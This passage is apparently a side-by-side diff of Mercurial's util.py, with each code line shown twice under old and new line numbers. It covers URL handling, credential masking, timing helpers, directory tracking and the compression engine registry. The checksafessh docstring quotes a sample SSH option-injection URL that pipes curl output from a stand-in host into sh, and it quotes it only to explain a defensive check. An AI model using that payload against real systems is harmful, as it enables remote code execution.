2769 or hasdriveletter(self.path)):
2772 s += '//'
2770 s += '//'
2773 if hasdriveletter(self.path):
2771 if hasdriveletter(self.path):
2774 s += '/'
2772 s += '/'
2775 if self.user:
2773 if self.user:
2776 s += urlreq.quote(self.user, safe=self._safechars)
2774 s += urlreq.quote(self.user, safe=self._safechars)
2777 if self.passwd:
2775 if self.passwd:
2778 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2776 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2779 if self.user or self.passwd:
2777 if self.user or self.passwd:
2780 s += '@'
2778 s += '@'
2781 if self.host:
2779 if self.host:
2782 if not (self.host.startswith('[') and self.host.endswith(']')):
2780 if not (self.host.startswith('[') and self.host.endswith(']')):
2783 s += urlreq.quote(self.host)
2781 s += urlreq.quote(self.host)
2784 else:
2782 else:
2785 s += self.host
2783 s += self.host
2786 if self.port:
2784 if self.port:
2787 s += ':' + urlreq.quote(self.port)
2785 s += ':' + urlreq.quote(self.port)
2788 if self.host:
2786 if self.host:
2789 s += '/'
2787 s += '/'
2790 if self.path:
2788 if self.path:
2791 # TODO: similar to the query string, we should not unescape the
2789 # TODO: similar to the query string, we should not unescape the
2792 # path when we store it, the path might contain '%2f' = '/',
2790 # path when we store it, the path might contain '%2f' = '/',
2793 # which we should *not* escape.
2791 # which we should *not* escape.
2794 s += urlreq.quote(self.path, safe=self._safepchars)
2792 s += urlreq.quote(self.path, safe=self._safepchars)
2795 if self.query:
2793 if self.query:
2796 # we store the query in escaped form.
2794 # we store the query in escaped form.
2797 s += '?' + self.query
2795 s += '?' + self.query
2798 if self.fragment is not None:
2796 if self.fragment is not None:
2799 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2797 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2800 return s
2798 return s
2801
2799
2802 __str__ = encoding.strmethod(__bytes__)
2800 __str__ = encoding.strmethod(__bytes__)
2803
2801
2804 def authinfo(self):
2802 def authinfo(self):
2805 user, passwd = self.user, self.passwd
2803 user, passwd = self.user, self.passwd
2806 try:
2804 try:
2807 self.user, self.passwd = None, None
2805 self.user, self.passwd = None, None
2808 s = bytes(self)
2806 s = bytes(self)
2809 finally:
2807 finally:
2810 self.user, self.passwd = user, passwd
2808 self.user, self.passwd = user, passwd
2811 if not self.user:
2809 if not self.user:
2812 return (s, None)
2810 return (s, None)
2813 # authinfo[1] is passed to urllib2 password manager, and its
2811 # authinfo[1] is passed to urllib2 password manager, and its
2814 # URIs must not contain credentials. The host is passed in the
2812 # URIs must not contain credentials. The host is passed in the
2815 # URIs list because Python < 2.4.3 uses only that to search for
2813 # URIs list because Python < 2.4.3 uses only that to search for
2816 # a password.
2814 # a password.
2817 return (s, (None, (s, self.host),
2815 return (s, (None, (s, self.host),
2818 self.user, self.passwd or ''))
2816 self.user, self.passwd or ''))
2819
2817
2820 def isabs(self):
2818 def isabs(self):
2821 if self.scheme and self.scheme != 'file':
2819 if self.scheme and self.scheme != 'file':
2822 return True # remote URL
2820 return True # remote URL
2823 if hasdriveletter(self.path):
2821 if hasdriveletter(self.path):
2824 return True # absolute for our purposes - can't be joined()
2822 return True # absolute for our purposes - can't be joined()
2825 if self.path.startswith(br'\\'):
2823 if self.path.startswith(br'\\'):
2826 return True # Windows UNC path
2824 return True # Windows UNC path
2827 if self.path.startswith('/'):
2825 if self.path.startswith('/'):
2828 return True # POSIX-style
2826 return True # POSIX-style
2829 return False
2827 return False
2830
2828
2831 def localpath(self):
2829 def localpath(self):
2832 if self.scheme == 'file' or self.scheme == 'bundle':
2830 if self.scheme == 'file' or self.scheme == 'bundle':
2833 path = self.path or '/'
2831 path = self.path or '/'
2834 # For Windows, we need to promote hosts containing drive
2832 # For Windows, we need to promote hosts containing drive
2835 # letters to paths with drive letters.
2833 # letters to paths with drive letters.
2836 if hasdriveletter(self._hostport):
2834 if hasdriveletter(self._hostport):
2837 path = self._hostport + '/' + self.path
2835 path = self._hostport + '/' + self.path
2838 elif (self.host is not None and self.path
2836 elif (self.host is not None and self.path
2839 and not hasdriveletter(path)):
2837 and not hasdriveletter(path)):
2840 path = '/' + path
2838 path = '/' + path
2841 return path
2839 return path
2842 return self._origpath
2840 return self._origpath
2843
2841
2844 def islocal(self):
2842 def islocal(self):
2845 '''whether localpath will return something that posixfile can open'''
2843 '''whether localpath will return something that posixfile can open'''
2846 return (not self.scheme or self.scheme == 'file'
2844 return (not self.scheme or self.scheme == 'file'
2847 or self.scheme == 'bundle')
2845 or self.scheme == 'bundle')
2848
2846
2849 def hasscheme(path):
2847 def hasscheme(path):
2850 return bool(url(path).scheme)
2848 return bool(url(path).scheme)
2851
2849
2852 def hasdriveletter(path):
2850 def hasdriveletter(path):
2853 return path and path[1:2] == ':' and path[0:1].isalpha()
2851 return path and path[1:2] == ':' and path[0:1].isalpha()
2854
2852
2855 def urllocalpath(path):
2853 def urllocalpath(path):
2856 return url(path, parsequery=False, parsefragment=False).localpath()
2854 return url(path, parsequery=False, parsefragment=False).localpath()
2857
2855
2858 def checksafessh(path):
2856 def checksafessh(path):
2859 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2857 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2860
2858
2861 This is a sanity check for ssh urls. ssh will parse the first item as
2859 This is a sanity check for ssh urls. ssh will parse the first item as
2862 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2860 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2863 Let's prevent these potentially exploited urls entirely and warn the
2861 Let's prevent these potentially exploited urls entirely and warn the
2864 user.
2862 user.
2865
2863
2866 Raises an error.Abort when the url is unsafe.
2864 Raises an error.Abort when the url is unsafe.
2867 """
2865 """
2868 path = urlreq.unquote(path)
2866 path = urlreq.unquote(path)
2869 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2867 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2870 raise error.Abort(_('potentially unsafe url: %r') %
2868 raise error.Abort(_('potentially unsafe url: %r') %
2871 (pycompat.bytestr(path),))
2869 (pycompat.bytestr(path),))
2872
2870
2873 def hidepassword(u):
2871 def hidepassword(u):
2874 '''hide user credential in a url string'''
2872 '''hide user credential in a url string'''
2875 u = url(u)
2873 u = url(u)
2876 if u.passwd:
2874 if u.passwd:
2877 u.passwd = '***'
2875 u.passwd = '***'
2878 return bytes(u)
2876 return bytes(u)
2879
2877
2880 def removeauth(u):
2878 def removeauth(u):
2881 '''remove all authentication information from a url string'''
2879 '''remove all authentication information from a url string'''
2882 u = url(u)
2880 u = url(u)
2883 u.user = u.passwd = None
2881 u.user = u.passwd = None
2884 return bytes(u)
2882 return bytes(u)
2885
2883
2886 timecount = unitcountfn(
2884 timecount = unitcountfn(
2887 (1, 1e3, _('%.0f s')),
2885 (1, 1e3, _('%.0f s')),
2888 (100, 1, _('%.1f s')),
2886 (100, 1, _('%.1f s')),
2889 (10, 1, _('%.2f s')),
2887 (10, 1, _('%.2f s')),
2890 (1, 1, _('%.3f s')),
2888 (1, 1, _('%.3f s')),
2891 (100, 0.001, _('%.1f ms')),
2889 (100, 0.001, _('%.1f ms')),
2892 (10, 0.001, _('%.2f ms')),
2890 (10, 0.001, _('%.2f ms')),
2893 (1, 0.001, _('%.3f ms')),
2891 (1, 0.001, _('%.3f ms')),
2894 (100, 0.000001, _('%.1f us')),
2892 (100, 0.000001, _('%.1f us')),
2895 (10, 0.000001, _('%.2f us')),
2893 (10, 0.000001, _('%.2f us')),
2896 (1, 0.000001, _('%.3f us')),
2894 (1, 0.000001, _('%.3f us')),
2897 (100, 0.000000001, _('%.1f ns')),
2895 (100, 0.000000001, _('%.1f ns')),
2898 (10, 0.000000001, _('%.2f ns')),
2896 (10, 0.000000001, _('%.2f ns')),
2899 (1, 0.000000001, _('%.3f ns')),
2897 (1, 0.000000001, _('%.3f ns')),
2900 )
2898 )
2901
2899
2902 _timenesting = [0]
2900 _timenesting = [0]
2903
2901
2904 def timed(func):
2902 def timed(func):
2905 '''Report the execution time of a function call to stderr.
2903 '''Report the execution time of a function call to stderr.
2906
2904
2907 During development, use as a decorator when you need to measure
2905 During development, use as a decorator when you need to measure
2908 the cost of a function, e.g. as follows:
2906 the cost of a function, e.g. as follows:
2909
2907
2910 @util.timed
2908 @util.timed
2911 def foo(a, b, c):
2909 def foo(a, b, c):
2912 pass
2910 pass
2913 '''
2911 '''
2914
2912
2915 def wrapper(*args, **kwargs):
2913 def wrapper(*args, **kwargs):
2916 start = timer()
2914 start = timer()
2917 indent = 2
2915 indent = 2
2918 _timenesting[0] += indent
2916 _timenesting[0] += indent
2919 try:
2917 try:
2920 return func(*args, **kwargs)
2918 return func(*args, **kwargs)
2921 finally:
2919 finally:
2922 elapsed = timer() - start
2920 elapsed = timer() - start
2923 _timenesting[0] -= indent
2921 _timenesting[0] -= indent
2924 stderr.write('%s%s: %s\n' %
2922 stderr.write('%s%s: %s\n' %
2925 (' ' * _timenesting[0], func.__name__,
2923 (' ' * _timenesting[0], func.__name__,
2926 timecount(elapsed)))
2924 timecount(elapsed)))
2927 return wrapper
2925 return wrapper
2928
2926
2929 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2927 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2930 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2928 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2931
2929
2932 def sizetoint(s):
2930 def sizetoint(s):
2933 '''Convert a space specifier to a byte count.
2931 '''Convert a space specifier to a byte count.
2934
2932
2935 >>> sizetoint(b'30')
2933 >>> sizetoint(b'30')
2936 30
2934 30
2937 >>> sizetoint(b'2.2kb')
2935 >>> sizetoint(b'2.2kb')
2938 2252
2936 2252
2939 >>> sizetoint(b'6M')
2937 >>> sizetoint(b'6M')
2940 6291456
2938 6291456
2941 '''
2939 '''
2942 t = s.strip().lower()
2940 t = s.strip().lower()
2943 try:
2941 try:
2944 for k, u in _sizeunits:
2942 for k, u in _sizeunits:
2945 if t.endswith(k):
2943 if t.endswith(k):
2946 return int(float(t[:-len(k)]) * u)
2944 return int(float(t[:-len(k)]) * u)
2947 return int(t)
2945 return int(t)
2948 except ValueError:
2946 except ValueError:
2949 raise error.ParseError(_("couldn't parse size: %s") % s)
2947 raise error.ParseError(_("couldn't parse size: %s") % s)
2950
2948
2951 class hooks(object):
2949 class hooks(object):
2952 '''A collection of hook functions that can be used to extend a
2950 '''A collection of hook functions that can be used to extend a
2953 function's behavior. Hooks are called in lexicographic order,
2951 function's behavior. Hooks are called in lexicographic order,
2954 based on the names of their sources.'''
2952 based on the names of their sources.'''
2955
2953
2956 def __init__(self):
2954 def __init__(self):
2957 self._hooks = []
2955 self._hooks = []
2958
2956
2959 def add(self, source, hook):
2957 def add(self, source, hook):
2960 self._hooks.append((source, hook))
2958 self._hooks.append((source, hook))
2961
2959
2962 def __call__(self, *args):
2960 def __call__(self, *args):
2963 self._hooks.sort(key=lambda x: x[0])
2961 self._hooks.sort(key=lambda x: x[0])
2964 results = []
2962 results = []
2965 for source, hook in self._hooks:
2963 for source, hook in self._hooks:
2966 results.append(hook(*args))
2964 results.append(hook(*args))
2967 return results
2965 return results
2968
2966
2969 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2967 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2970 '''Yields lines for a nicely formatted stacktrace.
2968 '''Yields lines for a nicely formatted stacktrace.
2971 Skips the 'skip' last entries, then return the last 'depth' entries.
2969 Skips the 'skip' last entries, then return the last 'depth' entries.
2972 Each file+linenumber is formatted according to fileline.
2970 Each file+linenumber is formatted according to fileline.
2973 Each line is formatted according to line.
2971 Each line is formatted according to line.
2974 If line is None, it yields:
2972 If line is None, it yields:
2975 length of longest filepath+line number,
2973 length of longest filepath+line number,
2976 filepath+linenumber,
2974 filepath+linenumber,
2977 function
2975 function
2978
2976
2979 Not be used in production code but very convenient while developing.
2977 Not be used in production code but very convenient while developing.
2980 '''
2978 '''
2981 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2979 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2982 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2980 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2983 ][-depth:]
2981 ][-depth:]
2984 if entries:
2982 if entries:
2985 fnmax = max(len(entry[0]) for entry in entries)
2983 fnmax = max(len(entry[0]) for entry in entries)
2986 for fnln, func in entries:
2984 for fnln, func in entries:
2987 if line is None:
2985 if line is None:
2988 yield (fnmax, fnln, func)
2986 yield (fnmax, fnln, func)
2989 else:
2987 else:
2990 yield line % (fnmax, fnln, func)
2988 yield line % (fnmax, fnln, func)
2991
2989
2992 def debugstacktrace(msg='stacktrace', skip=0,
2990 def debugstacktrace(msg='stacktrace', skip=0,
2993 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2991 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2994 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2992 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2995 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2993 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2996 By default it will flush stdout first.
2994 By default it will flush stdout first.
2997 It can be used everywhere and intentionally does not require an ui object.
2995 It can be used everywhere and intentionally does not require an ui object.
2998 Not be used in production code but very convenient while developing.
2996 Not be used in production code but very convenient while developing.
2999 '''
2997 '''
3000 if otherf:
2998 if otherf:
3001 otherf.flush()
2999 otherf.flush()
3002 f.write('%s at:\n' % msg.rstrip())
3000 f.write('%s at:\n' % msg.rstrip())
3003 for line in getstackframes(skip + 1, depth=depth):
3001 for line in getstackframes(skip + 1, depth=depth):
3004 f.write(line)
3002 f.write(line)
3005 f.flush()
3003 f.flush()
3006
3004
3007 class dirs(object):
3005 class dirs(object):
3008 '''a multiset of directory names from a dirstate or manifest'''
3006 '''a multiset of directory names from a dirstate or manifest'''
3009
3007
3010 def __init__(self, map, skip=None):
3008 def __init__(self, map, skip=None):
3011 self._dirs = {}
3009 self._dirs = {}
3012 addpath = self.addpath
3010 addpath = self.addpath
3013 if safehasattr(map, 'iteritems') and skip is not None:
3011 if safehasattr(map, 'iteritems') and skip is not None:
3014 for f, s in map.iteritems():
3012 for f, s in map.iteritems():
3015 if s[0] != skip:
3013 if s[0] != skip:
3016 addpath(f)
3014 addpath(f)
3017 else:
3015 else:
3018 for f in map:
3016 for f in map:
3019 addpath(f)
3017 addpath(f)
3020
3018
3021 def addpath(self, path):
3019 def addpath(self, path):
3022 dirs = self._dirs
3020 dirs = self._dirs
3023 for base in finddirs(path):
3021 for base in finddirs(path):
3024 if base in dirs:
3022 if base in dirs:
3025 dirs[base] += 1
3023 dirs[base] += 1
3026 return
3024 return
3027 dirs[base] = 1
3025 dirs[base] = 1
3028
3026
3029 def delpath(self, path):
3027 def delpath(self, path):
3030 dirs = self._dirs
3028 dirs = self._dirs
3031 for base in finddirs(path):
3029 for base in finddirs(path):
3032 if dirs[base] > 1:
3030 if dirs[base] > 1:
3033 dirs[base] -= 1
3031 dirs[base] -= 1
3034 return
3032 return
3035 del dirs[base]
3033 del dirs[base]
3036
3034
3037 def __iter__(self):
3035 def __iter__(self):
3038 return iter(self._dirs)
3036 return iter(self._dirs)
3039
3037
3040 def __contains__(self, d):
3038 def __contains__(self, d):
3041 return d in self._dirs
3039 return d in self._dirs
3042
3040
3043 if safehasattr(parsers, 'dirs'):
3041 if safehasattr(parsers, 'dirs'):
3044 dirs = parsers.dirs
3042 dirs = parsers.dirs
3045
3043
3046 def finddirs(path):
3044 def finddirs(path):
3047 pos = path.rfind('/')
3045 pos = path.rfind('/')
3048 while pos != -1:
3046 while pos != -1:
3049 yield path[:pos]
3047 yield path[:pos]
3050 pos = path.rfind('/', 0, pos)
3048 pos = path.rfind('/', 0, pos)
3051
3049
3052 # compression code
3050 # compression code
3053
3051
3054 SERVERROLE = 'server'
3052 SERVERROLE = 'server'
3055 CLIENTROLE = 'client'
3053 CLIENTROLE = 'client'
3056
3054
3057 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3055 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3058 (u'name', u'serverpriority',
3056 (u'name', u'serverpriority',
3059 u'clientpriority'))
3057 u'clientpriority'))
3060
3058
3061 class compressormanager(object):
3059 class compressormanager(object):
3062 """Holds registrations of various compression engines.
3060 """Holds registrations of various compression engines.
3063
3061
3064 This class essentially abstracts the differences between compression
3062 This class essentially abstracts the differences between compression
3065 engines to allow new compression formats to be added easily, possibly from
3063 engines to allow new compression formats to be added easily, possibly from
3066 extensions.
3064 extensions.
3067
3065
3068 Compressors are registered against the global instance by calling its
3066 Compressors are registered against the global instance by calling its
3069 ``register()`` method.
3067 ``register()`` method.
3070 """
3068 """
3071 def __init__(self):
3069 def __init__(self):
3072 self._engines = {}
3070 self._engines = {}
3073 # Bundle spec human name to engine name.
3071 # Bundle spec human name to engine name.
3074 self._bundlenames = {}
3072 self._bundlenames = {}
3075 # Internal bundle identifier to engine name.
3073 # Internal bundle identifier to engine name.
3076 self._bundletypes = {}
3074 self._bundletypes = {}
3077 # Revlog header to engine name.
3075 # Revlog header to engine name.
3078 self._revlogheaders = {}
3076 self._revlogheaders = {}
3079 # Wire proto identifier to engine name.
3077 # Wire proto identifier to engine name.
3080 self._wiretypes = {}
3078 self._wiretypes = {}
3081
3079
3082 def __getitem__(self, key):
3080 def __getitem__(self, key):
3083 return self._engines[key]
3081 return self._engines[key]
3084
3082
3085 def __contains__(self, key):
3083 def __contains__(self, key):
3086 return key in self._engines
3084 return key in self._engines
3087
3085
3088 def __iter__(self):
3086 def __iter__(self):
3089 return iter(self._engines.keys())
3087 return iter(self._engines.keys())
3090
3088
3091 def register(self, engine):
3089 def register(self, engine):
3092 """Register a compression engine with the manager.
3090 """Register a compression engine with the manager.
3093
3091
3094 The argument must be a ``compressionengine`` instance.
3092 The argument must be a ``compressionengine`` instance.
3095 """
3093 """
3096 if not isinstance(engine, compressionengine):
3094 if not isinstance(engine, compressionengine):
3097 raise ValueError(_('argument must be a compressionengine'))
3095 raise ValueError(_('argument must be a compressionengine'))
3098
3096
3099 name = engine.name()
3097 name = engine.name()
3100
3098
3101 if name in self._engines:
3099 if name in self._engines:
3102 raise error.Abort(_('compression engine %s already registered') %
3100 raise error.Abort(_('compression engine %s already registered') %
3103 name)
3101 name)
3104
3102
3105 bundleinfo = engine.bundletype()
3103 bundleinfo = engine.bundletype()
3106 if bundleinfo:
3104 if bundleinfo:
3107 bundlename, bundletype = bundleinfo
3105 bundlename, bundletype = bundleinfo
3108
3106
3109 if bundlename in self._bundlenames:
3107 if bundlename in self._bundlenames:
3110 raise error.Abort(_('bundle name %s already registered') %
3108 raise error.Abort(_('bundle name %s already registered') %
3111 bundlename)
3109 bundlename)
3112 if bundletype in self._bundletypes:
3110 if bundletype in self._bundletypes:
3113 raise error.Abort(_('bundle type %s already registered by %s') %
3111 raise error.Abort(_('bundle type %s already registered by %s') %
3114 (bundletype, self._bundletypes[bundletype]))
3112 (bundletype, self._bundletypes[bundletype]))
3115
3113
3116 # No external facing name declared.
3114 # No external facing name declared.
3117 if bundlename:
3115 if bundlename:
3118 self._bundlenames[bundlename] = name
3116 self._bundlenames[bundlename] = name
3119
3117
3120 self._bundletypes[bundletype] = name
3118 self._bundletypes[bundletype] = name
3121
3119
3122 wiresupport = engine.wireprotosupport()
3120 wiresupport = engine.wireprotosupport()
3123 if wiresupport:
3121 if wiresupport:
3124 wiretype = wiresupport.name
3122 wiretype = wiresupport.name
3125 if wiretype in self._wiretypes:
3123 if wiretype in self._wiretypes:
3126 raise error.Abort(_('wire protocol compression %s already '
3124 raise error.Abort(_('wire protocol compression %s already '
3127 'registered by %s') %
3125 'registered by %s') %
3128 (wiretype, self._wiretypes[wiretype]))
3126 (wiretype, self._wiretypes[wiretype]))
3129
3127
3130 self._wiretypes[wiretype] = name
3128 self._wiretypes[wiretype] = name
3131
3129
3132 revlogheader = engine.revlogheader()
3130 revlogheader = engine.revlogheader()
3133 if revlogheader and revlogheader in self._revlogheaders:
3131 if revlogheader and revlogheader in self._revlogheaders:
3134 raise error.Abort(_('revlog header %s already registered by %s') %
3132 raise error.Abort(_('revlog header %s already registered by %s') %
3135 (revlogheader, self._revlogheaders[revlogheader]))
3133 (revlogheader, self._revlogheaders[revlogheader]))
3136
3134
3137 if revlogheader:
3135 if revlogheader:
3138 self._revlogheaders[revlogheader] = name
3136 self._revlogheaders[revlogheader] = name
3139
3137
3140 self._engines[name] = engine
3138 self._engines[name] = engine
3141
3139
3142 @property
3140 @property
3143 def supportedbundlenames(self):
3141 def supportedbundlenames(self):
3144 return set(self._bundlenames.keys())
3142 return set(self._bundlenames.keys())
3145
3143
3146 @property
3144 @property
3147 def supportedbundletypes(self):
3145 def supportedbundletypes(self):
3148 return set(self._bundletypes.keys())
3146 return set(self._bundletypes.keys())
3149
3147
3150 def forbundlename(self, bundlename):
3148 def forbundlename(self, bundlename):
3151 """Obtain a compression engine registered to a bundle name.
3149 """Obtain a compression engine registered to a bundle name.
3152
3150
3153 Will raise KeyError if the bundle type isn't registered.
3151 Will raise KeyError if the bundle type isn't registered.
3154
3152
3155 Will abort if the engine is known but not available.
3153 Will abort if the engine is known but not available.
3156 """
3154 """
3157 engine = self._engines[self._bundlenames[bundlename]]
3155 engine = self._engines[self._bundlenames[bundlename]]
3158 if not engine.available():
3156 if not engine.available():
3159 raise error.Abort(_('compression engine %s could not be loaded') %
3157 raise error.Abort(_('compression engine %s could not be loaded') %
3160 engine.name())
3158 engine.name())
3161 return engine
3159 return engine
3162
3160
3163 def forbundletype(self, bundletype):
3161 def forbundletype(self, bundletype):
3164 """Obtain a compression engine registered to a bundle type.
3162 """Obtain a compression engine registered to a bundle type.
3165
3163
3166 Will raise KeyError if the bundle type isn't registered.
3164 Will raise KeyError if the bundle type isn't registered.
3167
3165
3168 Will abort if the engine is known but not available.
3166 Will abort if the engine is known but not available.
3169 """
3167 """
3170 engine = self._engines[self._bundletypes[bundletype]]
3168 engine = self._engines[self._bundletypes[bundletype]]
3171 if not engine.available():
3169 if not engine.available():
3172 raise error.Abort(_('compression engine %s could not be loaded') %
3170 raise error.Abort(_('compression engine %s could not be loaded') %
3173 engine.name())
3171 engine.name())
3174 return engine
3172 return engine
3175
3173
3176 def supportedwireengines(self, role, onlyavailable=True):
3174 def supportedwireengines(self, role, onlyavailable=True):
3177 """Obtain compression engines that support the wire protocol.
3175 """Obtain compression engines that support the wire protocol.
3178
3176
3179 Returns a list of engines in prioritized order, most desired first.
3177 Returns a list of engines in prioritized order, most desired first.
3180
3178
3181 If ``onlyavailable`` is set, filter out engines that can't be
3179 If ``onlyavailable`` is set, filter out engines that can't be
3182 loaded.
3180 loaded.
3183 """
3181 """
3184 assert role in (SERVERROLE, CLIENTROLE)
3182 assert role in (SERVERROLE, CLIENTROLE)
3185
3183
3186 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3184 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3187
3185
3188 engines = [self._engines[e] for e in self._wiretypes.values()]
3186 engines = [self._engines[e] for e in self._wiretypes.values()]
3189 if onlyavailable:
3187 if onlyavailable:
3190 engines = [e for e in engines if e.available()]
3188 engines = [e for e in engines if e.available()]
3191
3189
3192 def getkey(e):
3190 def getkey(e):
3193 # Sort first by priority, highest first. In case of tie, sort
3191 # Sort first by priority, highest first. In case of tie, sort
3194 # alphabetically. This is arbitrary, but ensures output is
3192 # alphabetically. This is arbitrary, but ensures output is
3195 # stable.
3193 # stable.
3196 w = e.wireprotosupport()
3194 w = e.wireprotosupport()
3197 return -1 * getattr(w, attr), w.name
3195 return -1 * getattr(w, attr), w.name
3198
3196
3199 return list(sorted(engines, key=getkey))
3197 return list(sorted(engines, key=getkey))
3200
3198
3201 def forwiretype(self, wiretype):
3199 def forwiretype(self, wiretype):
3202 engine = self._engines[self._wiretypes[wiretype]]
3200 engine = self._engines[self._wiretypes[wiretype]]
3203 if not engine.available():
3201 if not engine.available():
3204 raise error.Abort(_('compression engine %s could not be loaded') %
3202 raise error.Abort(_('compression engine %s could not be loaded') %
3205 engine.name())
3203 engine.name())
3206 return engine
3204 return engine
3207
3205
3208 def forrevlogheader(self, header):
3206 def forrevlogheader(self, header):
3209 """Obtain a compression engine registered to a revlog header.
3207 """Obtain a compression engine registered to a revlog header.
3210
3208
3211 Will raise KeyError if the revlog header value isn't registered.
3209 Will raise KeyError if the revlog header value isn't registered.
3212 """
3210 """
3213 return self._engines[self._revlogheaders[header]]
3211 return self._engines[self._revlogheaders[header]]
3214
3212
3215 compengines = compressormanager()
3213 compengines = compressormanager()
3216
3214
3217 class compressionengine(object):
3215 class compressionengine(object):
3218 """Base class for compression engines.
3216 """Base class for compression engines.
3219
3217
3220 Compression engines must implement the interface defined by this class.
3218 Compression engines must implement the interface defined by this class.
3221 """
3219 """
3222 def name(self):
3220 def name(self):
3223 """Returns the name of the compression engine.
3221 """Returns the name of the compression engine.
3224
3222
3225 This is the key the engine is registered under.
3223 This is the key the engine is registered under.
3226
3224
3227 This method must be implemented.
3225 This method must be implemented.
3228 """
3226 """
3229 raise NotImplementedError()
3227 raise NotImplementedError()
3230
3228
3231 def available(self):
3229 def available(self):
3232 """Whether the compression engine is available.
3230 """Whether the compression engine is available.
3233
3231
3234 The intent of this method is to allow optional compression engines
3232 The intent of this method is to allow optional compression engines
3235 that may not be available in all installations (such as engines relying
3233 that may not be available in all installations (such as engines relying
3236 on C extensions that may not be present).
3234 on C extensions that may not be present).
3237 """
3235 """
3238 return True
3236 return True
3239
3237
3240 def bundletype(self):
3238 def bundletype(self):
3241 """Describes bundle identifiers for this engine.
3239 """Describes bundle identifiers for this engine.
3242
3240
3243 If this compression engine isn't supported for bundles, returns None.
3241 If this compression engine isn't supported for bundles, returns None.
3244
3242
3245 If this engine can be used for bundles, returns a 2-tuple of strings of
3243 If this engine can be used for bundles, returns a 2-tuple of strings of
3246 the user-facing "bundle spec" compression name and an internal
3244 the user-facing "bundle spec" compression name and an internal
3247 identifier used to denote the compression format within bundles. To
3245 identifier used to denote the compression format within bundles. To
3248 exclude the name from external usage, set the first element to ``None``.
3246 exclude the name from external usage, set the first element to ``None``.
3249
3247
3250 If bundle compression is supported, the class must also implement
3248 If bundle compression is supported, the class must also implement
3251 ``compressstream`` and `decompressorreader``.
3249 ``compressstream`` and `decompressorreader``.
3252
3250
3253 The docstring of this method is used in the help system to tell users
3251 The docstring of this method is used in the help system to tell users
3254 about this engine.
3252 about this engine.
3255 """
3253 """
3256 return None
3254 return None
3257
3255
3258 def wireprotosupport(self):
3256 def wireprotosupport(self):
3259 """Declare support for this compression format on the wire protocol.
3257 """Declare support for this compression format on the wire protocol.
3260
3258
3261 If this compression engine isn't supported for compressing wire
3259 If this compression engine isn't supported for compressing wire
3262 protocol payloads, returns None.
3260 protocol payloads, returns None.
3263
3261
3264 Otherwise, returns ``compenginewireprotosupport`` with the following
3262 Otherwise, returns ``compenginewireprotosupport`` with the following
3265 fields:
3263 fields:
3266
3264
3267 * String format identifier
3265 * String format identifier
3268 * Integer priority for the server
3266 * Integer priority for the server
3269 * Integer priority for the client
3267 * Integer priority for the client
3270
3268
3271 The integer priorities are used to order the advertisement of format
3269 The integer priorities are used to order the advertisement of format
3272 support by server and client. The highest integer is advertised
3270 support by server and client. The highest integer is advertised
3273 first. Integers with non-positive values aren't advertised.
3271 first. Integers with non-positive values aren't advertised.
3274
3272
3275 The priority values are somewhat arbitrary and only used for default
3273 The priority values are somewhat arbitrary and only used for default
3276 ordering. The relative order can be changed via config options.
3274 ordering. The relative order can be changed via config options.
3277
3275
3278 If wire protocol compression is supported, the class must also implement
3276 If wire protocol compression is supported, the class must also implement
3279 ``compressstream`` and ``decompressorreader``.
3277 ``compressstream`` and ``decompressorreader``.
3280 """
3278 """
3281 return None
3279 return None
3282
3280
3283 def revlogheader(self):
3281 def revlogheader(self):
3284 """Header added to revlog chunks that identifies this engine.
3282 """Header added to revlog chunks that identifies this engine.
3285
3283
3286 If this engine can be used to compress revlogs, this method should
3284 If this engine can be used to compress revlogs, this method should
3287 return the bytes used to identify chunks compressed with this engine.
3285 return the bytes used to identify chunks compressed with this engine.
3288 Else, the method should return ``None`` to indicate it does not
3286 Else, the method should return ``None`` to indicate it does not
3289 participate in revlog compression.
3287 participate in revlog compression.
3290 """
3288 """
3291 return None
3289 return None
3292
3290
3293 def compressstream(self, it, opts=None):
3291 def compressstream(self, it, opts=None):
3294 """Compress an iterator of chunks.
3292 """Compress an iterator of chunks.
3295
3293
3296 The method receives an iterator (ideally a generator) of chunks of
3294 The method receives an iterator (ideally a generator) of chunks of
3297 bytes to be compressed. It returns an iterator (ideally a generator)
3295 bytes to be compressed. It returns an iterator (ideally a generator)
3298 of bytes of chunks representing the compressed output.
3296 of bytes of chunks representing the compressed output.
3299
3297
3300 Optionally accepts an argument defining how to perform compression.
3298 Optionally accepts an argument defining how to perform compression.
3301 Each engine treats this argument differently.
3299 Each engine treats this argument differently.
3302 """
3300 """
3303 raise NotImplementedError()
3301 raise NotImplementedError()
3304
3302
3305 def decompressorreader(self, fh):
3303 def decompressorreader(self, fh):
3306 """Perform decompression on a file object.
3304 """Perform decompression on a file object.
3307
3305
3308 Argument is an object with a ``read(size)`` method that returns
3306 Argument is an object with a ``read(size)`` method that returns
3309 compressed data. Return value is an object with a ``read(size)`` that
